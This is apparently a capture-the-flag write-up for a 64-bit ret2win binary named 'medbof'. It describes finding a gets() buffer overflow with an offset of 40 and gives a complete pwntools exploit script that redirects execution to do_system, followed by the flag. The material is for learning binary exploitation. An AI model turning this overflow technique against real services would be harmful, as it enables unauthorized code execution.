medbof

3KB

medbof.rar

this is a classic ret2win challenge

File Reconnaissance :

this is a 64bit binary, not stripped which means that the names of the functions is not obfuscated which makes reversing process easier.

the only protection enabled is NX which makes executing shellcode impossible.

let's open the binary using ghidra

we have 3 functions

main :

do_input :

and the last function is the win function we wanna jmp to

do_system :

gets is a vulnerable to buffer overflow so we are going to overflow the buffer and overwrite the RIP with the address of the win function (do_system)

Calculating the offset to overwrite the RIP :

like the previous challenge (crashme) using gdb-pwndbg and cyclic we will find that the offset is 40

Exploit :

#!/usr/bin/env python3
from pwn import *

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)

# Set up pwntools for the correct architecture
exe = './medbof'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

io = start()

offset = 40
ret = 0x4004d1; #ropper --file=medbof --search="ret"
payload = flat(
	b'A' * offset,
	ret, # fix stack alignment issue
	elf.symbols["do_system"] # ret2win
)

io.sendlineafter(b'a little harder this time', payload)

io.interactive()

now let's run the exploit remotely

Flag :

flag{getting_better_at_hacking_binaries_i_see...}